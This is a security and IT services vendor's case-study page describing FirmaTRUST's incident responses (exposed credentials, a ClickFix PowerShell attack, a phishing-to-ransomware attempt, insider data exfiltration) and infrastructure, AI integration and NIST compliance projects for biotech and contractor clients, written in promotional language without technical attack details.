Case study taxonomy: Case Studies

Exposed Passwords. Sitting in Plain Sight. Found Before the Attackers Did.

FirmaTRUST SOC Team  |  Data Exposure  |  Cloud Security |  Compliance

“The FirmaTRUST SOC team caught what we missed — credentials sitting exposed in a personal folder. Their response was swift, their guidance was practical, and they didn’t just fix the symptom. They pushed us toward a proper password vault solution that eliminates the risk entirely.”

— Chief Financial Officer, Financial Services Industry

THE DISCOVERY

A file sitting in a personal Box Drive folder. No alerts triggered. No flags raised. To the naked eye, nothing unusual.

But FirmaTRUST’s SOC was watching. AI-driven monitoring surfaced the file and flagged it for human review. What analysts found was a plaintext credential store — usernames, passwords, sensitive access details — sitting exposed in a shared cloud environment accessible far beyond its intended audience.

The client had no idea it was there. The attackers hadn’t found it yet.

THE RESPONSE

The team moved fast. The file was analyzed, the risk validated, and remediation steps executed immediately. Access was locked down. Monitoring was expanded. And rather than closing the ticket and moving on, the SOC team did something most vendors don’t — they fixed the underlying problem.

Accretive Wealth was guided toward an enterprise password vault solution. No more plaintext. No more exposure risk. The vulnerability that allowed this to happen was closed permanently.

WHAT FIRMATRUST SOC DID

• AI + human monitoring— detected exposed credential file in a Box Drive personal folder before any unauthorized access occurred
• Risk validation— performed detailed activity analysis to confirm exposure scope and assess potential impact
• Immediate remediation— renamed and restricted the file to authorized personnel, eliminating public exposure
• Continuous monitoring— activated persistent surveillance for unauthorized access attempts against the affected assets
• Root cause resolution— identified insecure password storage practices as the systemic issue — not just the file
• Strategic guidance— recommended and supported adoption of an enterprise password vault to eliminate recurrence

OUTCOME

WHY IT MATTERS

Most credential exposures aren’t discovered by the company — they’re discovered by attackers. FirmaTRUST’s continuous SOC visibility across cloud environments means risks like this get caught and closed before they become breaches. We don’t just detect. We fix the root cause.

Threat Detected. Contained. Neutralized – Before it Could Execute.

FirmaTRUST SOC & DFIR Team | Incident Response | Threat Intelligence

“The attack came through a vendor website we trusted, invisible to the users who triggered it. The FirmaTRUST SOC team detected the anomalous PowerShell activity across three endpoints simultaneously, correlated the threat, and contained it before any payload executed. This is exactly the kind of coverage we cannot build in-house.”

— Vice President, IT, Life Sciences and Biotechnology

THE INCIDENT

Three employees accessed their trusted vendor’s website — standard, routine business activity. What none of them knew: that site had been silently compromised.

In the background, malicious scripts were fired. A multi-stage ClickFix attack launched — PowerShell commands designed to download and execute harmful payloads across all three endpoints simultaneously. The attack was invisible at the user level. Perfectly camouflaged as legitimate traffic.

It didn’t get far.

WHAT FIRMATRUST SOC DID

• Detected anomalous PowerShell execution across three endpoints in real time using Microsoft Defender telemetry and behavioral analytics
• Correlated the threat across all affected devices — confirming attacker-controlled infrastructure and staged malware deployment
• Immediately blocked attacker IPs, malicious domains, and payload delivery mechanisms
• Contained all affected systems before lateral movement could be established
• Guided full remediation: endpoint isolation, IOC blocking, and system cleansing

OUTCOME

WHY IT MATTERS

This incident proves what continuous monitoring delivers: the ability to detect and stop advanced, user-triggered attacks before they cause damage. Traditional trust boundaries failed — FirmaTRUST’s SOC didn’t.

Credentials Stolen. Ransomware Deployed. Stopped Cold — Zero Files Encrypted.

FirmaTRUST SOC & DFIR Team  |  Ransomware Prevention  |  Phishing

“A sophisticated phishing attack led to full account compromise — the attacker was already moving laterally across email, Microsoft Teams, and OneDrive when FirmaTRUST SOC team intervened. They stopped the ransomware before a single file was encrypted. The speed and precision of their response were remarkable.”

— Vice President, Finance & Operations, Life Sciences and Biotechnology

THE ATTACK

It started with a single email. Legitimate-looking. A document link. One click, and the user was walked through a chain of fake login pages that harvested their credentials and one-time password in real time.

The attacker moved immediately. Email, Teams, OneDrive, critical applications — all compromised within minutes. They registered new authentication methods to lock out the real user and began distributing renamed files internally and to external vendors. Ransomware execution files were already staged and ready to detonate.

FirmaTRUST’s SOC was faster.

THE RESPONSE

Our team detected the breach at the point of unauthorized access — flagged by unusual location, unknown device, and behavioural anomalies that no static rule would catch. From there, the response was immediate and surgical.

Every vector was shut down simultaneously. No lateral escape routes. No time for the ransomware to execute.

WHAT FIRMATRUST SOC DID

• AI + human monitoring— detected unauthorized access from an anomalous location and unrecognized device in real time
• Phishing infrastructure identified— exposed credential-harvesting pages and OTP theft activity before feeds had flagged the infrastructure
• Cloud-wide containment— stopped attacker activity across email, Teams, OneDrive, and all connected applications simultaneously
• Ransomware neutralized— identified and blocked every execution file during active threat hunting — before detonation
• Full environment sweep— removed all malicious files and contained the infection across the environment
• IOC blocking— pushed all related indicators of compromise across every security control
• Account secured— revoked attacker access, removed unauthorized auth methods, and fully restored the compromised account

OUTCOME

WHY IT MATTERS

Ransomware doesn’t announce itself. It moves fast, hides in trusted traffic, and strikes when defenses are looking elsewhere. This case proves that speed and precision matter more than perimeter walls. FirmaTRUST’s SOC caught a live, multi-stage attack mid-execution — and ended it before it cost a single file.

Detected. Investigated. Shut Down — Before the Data Left.

FirmaTRUST SOC & DFIR Team | Incident Response | Threat Intelligence

“When suspicious activity was detected in our environment, the FirmaTRUST SOC and DFIR team responded without delay. They didn’t just contain the incident — they uncovered unauthorized tools, strengthened our controls, and left our security posture measurably better than before.”

— Chief Operations Officer, Life Sciences and Biotechnology

THE SITUATION

Company flagged something unusual. Suspicious system activity. Possible unauthorized data movement. The kind of signal most organizations miss — or investigate too slowly.

FirmaTRUST’s SOC (Security Operations Center) and DFIR (Digital Forensics and Incident Response) teams were engaged immediately. The question wasn’t whether something was wrong. The question was: how far had it gone?

THE INVESTIGATION

Our DFIR team went deep. Forensic analysis of the affected system surfaced unauthorized tools and programs specifically designed to move data outside approved channels — tools that had no business being there.

We didn’t just find the problem. We mapped the full blast radius: every affected system, every unauthorized application, every gap in visibility that allowed this to happen in the first place.

WHAT FIRMATRUST DID

• AI-driven detection— deployed policy rules and behavioral analytics to surface threats that proactive monitoring would have missed
• Rapid response— engaged immediately on first report of suspicious activity — no delays, no escalation lag
• Deep-dive DFIR— full forensic investigation to assess scope, validate risk, and identify every exfiltration vector
• Tool eradication— identified, blocked, and removed all unauthorized programs and transfer mechanisms
• Environment-wide audit— swept all systems for non-approved software — not just the affected machine
• Application control— implemented software whitelisting to prevent unauthorized tools from ever running again
• Enhanced visibility— hardened detection capabilities so similar threats are caught earlier, faster

OUTCOME

WHY IT MATTERS

Insider threats are the hardest to catch — because the traffic looks normal. This case proves that when SOC monitoring and DFIR expertise work together, even the most subtle unauthorized activity gets exposed. FirmaTRUST doesn’t wait for damage reports. We prevent them.

The Challenge

A global investment firm at the forefront of genomics and precision health needed to operationalize AI across the enterprise.

But critical barriers stood in the way:

• Documents siloed across Box and Dropbox
• No unified access within Microsoft 365 Copilot
• Complex, unreliable integrations—especially with Box
• Emerging vendor changes introducing long-term risk

The objective was clear:

Enable seamless, AI-powered access to knowledge—without disruption, risk, or replatforming.

The FirmaTRUST Solution

FirmaTRUST delivered a fully integrated, organization-wide Copilot solution—combining deep technical execution with strategic foresight.

Unified AI-Powered Document Access

• Integrated Box and Dropbox directly into Microsoft 365 Copilot
• Enabled users to search, summarize, and interact with content using natural language
• Delivered instant, org-wide deployment—no user setup required

Execution Where Others Failed

• Successfully implemented Dropbox integration with seamless deployment
• Solved complex Box integration challenges—including authentication, permissions, and indexing
• Overcame issues that required deep escalation beyond standard vendor support

Strategic Insight That Matters

• Identified a critical shift: Box Connector is no longer supported
• Provided executive-level guidance on:

• Risk exposure from deprecated integrations
• Box’s transition to its proprietary AI Agent platform
• Long-term content and AI strategy alignment

The Results

• One unified AI interface across multiple content platforms
• Immediate productivity gains with zero user friction
• Elimination of data silos across Box and Dropbox
• Faster decision-making through AI-powered insights
• Future-ready strategy aligned with evolving vendor ecosystems

The Impact

FirmaTRUST transformed fragmented systems into a centralized, intelligent knowledge engine.

• Increased operational efficiency
• Reduced integration risk
• Enabled enterprise-wide AI adoption
• Positioned the firm for the next generation of work

Why FirmaTRUST

AI is powerful—but only if it’s implemented right.

When complexity is high and the stakes are higher, organizations don’t experiment.

They partner with FirmaTRUST.

Overview

A venture-backed biotechnology startup that initially operated in stealth mode transitioned into building out a new office and laboratory facility, requiring a secure, scalable, and cost-effective IT infrastructure. The organization partnered with a FirmaTRUST to design and implement a modern hybrid environment that could support both confidentiality during stealth operations and rapid operational expansion. The client required a hybrid architecture combining on-premises systems with AWS cloud services, while maintaining strict confidentiality, regulatory readiness, and robust cybersecurity controls.

Business Challenges

• Stealth Mode Operations: Extreme confidentiality requirements with minimal digital footprint and controlled access to sensitive research data.
• Lab Security Requirements: Protection of proprietary research, instruments, and data within on-site laboratory environments.
• Rapid Scaling Needs: Infrastructure capable of supporting fast team growth without re-architecture.
• Cost Efficiency: Balancing enterprise-grade security with startup budget constraints.
• Compliance Readiness: Preparing for future regulatory frameworks (GxP and industry-specific standards).

The FirmaTRUST Solution

FirmaTRUST designed and deployed a hybrid IT architecture integrating secure on-premises infrastructure with AWS cloud services. The solution emphasized layered security, network segmentation, identity management, and high availability.

Core Architecture Components

• Hybrid Cloud Design:
  • AWS used for scalable compute, storage, and secure data processing
  • On-prem infrastructure supporting lab equipment, low-latency workloads, and secure local access
• Enterprise Platforms:
  • Microsoft 365 for identity, MDM, SSO/MFA, collaboration, and productivity
  • AWS for cloud-native computational workloads and secure storage
• Network & Security Stack:
  • Palo Alto Networks and Zscaler for advanced threat protection and secure access
  • Aruba and Cisco for enterprise-grade switching and wireless networking

Security-First Design

Security was embedded into every layer of the infrastructure, with special emphasis on protecting the laboratory environment.

Network Segmentation (VLAN Architecture)

A highly segmented network design was implemented using VLANs to isolate critical systems:

• Corporate VLAN: User devices and general business operations
• Lab VLAN: Dedicated to laboratory equipment and research systems
• Guest VLAN: Internet-only access with strict isolation
• Management VLAN: Restricted administrative access for IT systems

Key Benefits:

• Prevents lateral movement across network zones
• Limits exposure of sensitive lab systems
• Enables granular policy enforcement

Firewall & Policy Enforcement

Advanced firewall rule sets were configured to strictly control traffic between VLANs:

• Default deny-all posture between segments
• Explicit allow rules for required services only
• Deep packet inspection for sensitive traffic
• Logging and monitoring for audit trails

Lab environment protections included:

• No direct internet access from lab VLAN
• Controlled access via secure jump hosts
• Strict east-west traffic inspection

Identity & Endpoint Security

Single Sign-On (SSO)

• Centralized identity management via Microsoft Entra ID (Azure AD)
• Conditional access policies based on device compliance, location, and risk

Mobile Device Management (MDM)

• Microsoft Intune deployed for device enrollment and policy enforcement
• Ensured all endpoints meet security baseline before accessing resources

Endpoint Detection & Response (EDR)

• Advanced EDR deployed across all endpoints
• Real-time threat detection and automated response capabilities

Zero Trust Principles

• Continuous verification of users and devices
• Least-privilege access enforced across all systems

High Availability & Reliability

The infrastructure leveraged enterprise-grade, highly available technologies:

• Redundant PAN firewall clusters
• Aruba/Cisco switching with failover configurations
• AWS multi-AZ deployments for resilience
• Secure remote access via Zscaler and VPN redundancy

Cost Optimization Strategy

Despite enterprise-grade requirements, the MSP implemented a cost-conscious approach:

• Leveraged cloud elasticity to avoid overprovisioning
• Standardized on integrated platforms (Microsoft 365, PAN) to reduce tooling sprawl
• Phased deployment aligned with company growth
• Optimized licensing models for startup efficiency

Results & Outcomes

Security

• Fully segmented and protected lab environment
• Zero Trust architecture minimizing risk exposure
• Comprehensive monitoring and audit readiness

Scalability

• Infrastructure supports rapid hiring and expansion
• Cloud-native components enable seamless growth

Operational Efficiency

• Centralized identity and device management
• Streamlined onboarding and access control

Cost Effectiveness

• Enterprise-grade security achieved within startup budget
• Reduced long-term operational overhead

Conclusion

By combining a Palo Alto Network security framework with a hybrid AWS architecture, we successfully delivered a secure, scalable, and cost-effective IT foundation for a stealth-mode biotech startup. The solution not only protected sensitive laboratory environments through advanced VLAN segmentation and firewall policies but also positioned the company for future growth, compliance, and innovation.

This engagement highlights how thoughtful design, strong security principles, and strategic technology selection can enable startups to operate with enterprise-level confidence from day one.

Why FirmaTRUST

When scaling globally, there is no margin for error.

You need precision.
You need consistency.
You need execution at scale.

FirmaTRUST delivers all three.

Client Overview

A multi-location biotechnology company specializing in sensitive research and regulated data..

The Challenge

The client was hit by a sophisticated ransomware attack that:

• Disrupted operations across multiple sites
• Put critical research data at risk
• Exposed gaps in security, visibility, and infrastructure resilience

They needed immediate containment—and a long-term solution to prevent it from happening again.

FirmaTRUST’s Approach

Rapid Incident Response

FirmaTRUST quickly mobilized to:

• Identify and isolate compromised systems
• Stop lateral movement across the network
• Secure critical infrastructure within hours

Quarantine & Containment

Through advanced segmentation and access control:

• Infected assets were contained immediately
• Business-critical systems remained protected
• The spread of ransomware was fully halted

Threat Intelligence-Driven Defense

Using real-time threat intelligence, FirmaTRUST:

• Identified the ransomware variant and attack patterns
• Blocked malicious indicators across the environment
• Strengthened detection and prevention capabilities

The Transformation

Following recovery, FirmaTRUST redesigned the company’s entire IT environment into a secure, scalable hybrid model.

Modern Hybrid Infrastructure

Built across on-premises and cloud environments using:

• Microsoft 365 for secure productivity and identity
• AWS for scalable cloud infrastructure
• Palo Alto Networks for next-generation firewall protection
• Cisco for high-performance networking
• Infoblox for secure DNS and network services
• Windows & Linux Servers for flexible workloads
• NetApp for high-performance, resilient storage

Key Outcomes

Stronger Security

• Zero Trust architecture with enhanced access controls
• Advanced threat detection and continuous monitoring
• Reduced attack surface across all locations

High Performance & Availability

• Optimized workloads across hybrid cloud environments
• Increased uptime and system reliability
• Seamless connectivity between locations

Cost Efficiency

• Reduced infrastructure costs through cloud optimization
• Scalable resources aligned with business needs
• Lower operational overhead with centralized management

Business Resilience

• Rapid recovery capabilities with secure backup strategies
• Improved compliance posture for biotech regulations
• Long-term protection of sensitive intellectual property

The Result

FirmaTRUST not only stopped a critical ransomware attack—it transformed the client’s IT foundation. The organization now operates on a secure, high-performance, and cost-effective hybrid infrastructure designed to scale and withstand future threats.

Partner with FirmaTRUST

Looking to strengthen your security posture or modernize your infrastructure? FirmaTRUST delivers end-to-end solutions—from incident response to full-scale transformation.

Why FirmaTRUST

When scaling globally, there is no margin for error.

You need precision.
You need consistency.
You need execution at scale.

FirmaTRUST delivers all three.

The Challenge

A high-potential biotech start up needed to focus on what mattered most—innovation and product development.

But there was a problem:

• IT infrastructure lacked standardization and scalability
• Security posture needed strengthening
• Network performance and resilience were limiting growth

The company understood a critical truth:

Without a strong IT foundation, growth would stall.

The FirmaTRUST Solution

FirmaTRUST stepped in as a strategic IT transformation partner, delivering a structured, phased modernization of the entire environment.

We began with a comprehensive IT audit, then executed a long-term roadmap built for stability, security, and scale.

Strategic Modernization Approach

• Developed a multi-phase IT transformation roadmap with detailed project plans, SOPWs, and BOMs
• Executed improvements over 18 months—ensuring minimal disruption to daily operations

Infrastructure Optimization

• Redesigned network architecture to eliminate inefficiencies (including removal of daisy-chained switches)
• Implemented a hub-and-spoke model for improved performance and data flow
• Enhanced server, storage, and overall system performance

Security & Stability Enhancements

• Upgraded firewall systems with the latest secure and stable firmware
• Conducted wireless spectrum analysis to optimize network performance
• Strengthened Active Directory for resiliency across locations

Operational Excellence

• Established vendor SLAs for improved reliability and support
• Tested all changes in controlled environments before deployment
• Applied a methodical, zero-disruption approach to every upgrade

We didn’t rush changes.
We engineered them—strategically, safely, and correctly.

The Results

• Delivered a fully modernized, secure, and resilient IT environment
• Improved network performance, reliability, and scalability
• Enabled the client to focus entirely on innovation and business growth

The Impact

FirmaTRUST transformed a fragmented IT environment into a high-performing, future-ready infrastructure.

• Reduced operational risk
• Increased system stability
• Established a scalable foundation for growth

Ongoing Partnership

This is not a one-time engagement.

FirmaTRUST continues to serve as a trusted technology partner, supporting, optimizing, and securing the client’s evolving environment.

Why FirmaTRUST

Growing companies don’t need reactive IT.
They need a partner who builds for the future.

FirmaTRUST delivers exactly that.

The Challenge

As a U.S. government contractor, Stellar Solutions was required to meet NIST 800-171 compliance—a strict cybersecurity framework designed to protect Controlled Unclassified Information (CUI).

The stakes were mission-critical:

• Compliance was mandatory to maintain DoD contracts
• Security controls had to withstand sophisticated internal and external threats
• Infrastructure, policies, and systems needed to align with federal standards

Anything less than full compliance was not an option.

The FirmaTRUST Solution

FirmaTRUST partnered closely with Stellar Solutions as a strategic cybersecurity and compliance advisor, driving the transformation required to meet NIST standards.

We delivered:

• Comprehensive infrastructure assessment and remediation strategy
• Deployment of next-generation firewalls and advanced security controls
• Implementation of compliant VPN solutions for secure access
• Integration of enterprise-grade security management tools
• Hands-on collaboration with internal security teams to ensure full alignment with NIST 800-171 requirements

We didn’t just recommend changes—
we engineered a secure, compliant environment built for federal-grade demands.

The Results

• Successfully achieved NIST 800-171 compliance
• Strengthened overall cybersecurity posture across the organization
• Enabled continued eligibility for critical DoD contracts

Ongoing Impact

FirmaTRUST continues to support Stellar Solutions in advancing their compliance maturity through:

• CMMC (Cybersecurity Maturity Model Certification) readiness and implementation
• Ongoing security enhancements and risk management

Compliance achieved. Security elevated. Mission secured.

The Challenge

A fast-growing biotech start up needed to transition from an incubator environment into its first fully operational facility—without compromising speed, security, or scalability.

The objective was clear:

• Build a production-ready IT infrastructure from the ground up
• Ensure enterprise-grade security and compliance from day one
• Enable scientists and researchers to focus on innovation—not IT challenges

There was no room for delays, missteps, or rework.

The FirmaTRUST Solution

FirmaTRUST was engaged as a strategic IT and infrastructure partner, leading the end-to-end design and execution of a complete, secure technology environment.

We delivered:

End-to-End Infrastructure Design & Build

• Collaborated directly with architects, general contractors, and construction teams to ensure IT was fully integrated into building design—not an after thought
• Designed structured cabling, network architecture, and data room (MDF/IDF) requirements

Connectivity & Core Systems

• Coordinated with ISPs to deliver high-performance, reliable connectivity
• Engineered secure network infrastructure with next-generation firewalls and edge protection

Modern Workplace & Cloud Architecture

• Implemented a secure, cloud-first technology stack, including:
  o Identity & Access Management (Okta with SSO & MFA)
  o Microsoft 365 for collaboration and productivity
  o Mobile Device Management (Workspace ONE)

Security-First Approach

• Embedded cybersecurity into every layer of the environment
• Deployed endpoint protection, encryption, and threat management solutions
• Leveraged best-in-class technologies from partners like VMware, Microsoft, Okta, and Carbon Black

Workplace Technology Integration

• Designed and deployed fully equipped conference rooms and AV systems
• Ensured optimal performance with acoustic planning and smart room technologies

The Results

• Successfully launched a fully operational, enterprise-grade IT environment
• Delivered a secure, scalable infrastructure ready for rapid growth
• Enabled the client to focus entirely on research, innovation, and business expansion

The Impact

FirmaTRUST transformed an empty space into a high-performance, secure, and future-ready technology ecosystem.

• Accelerated time to operational readiness
• Eliminated infrastructure risk
• Established a foundation for long-term scalability and compliance

Proven Expertise in Biotech

This is not a one-off success.

FirmaTRUST has led numerous “greenfield” IT builds across the San Francisco Bay Area—helping biotech start ups scale into global, multi-national enterprises.

From lab start up to industry leader—FirmaTRUST builds the foundation.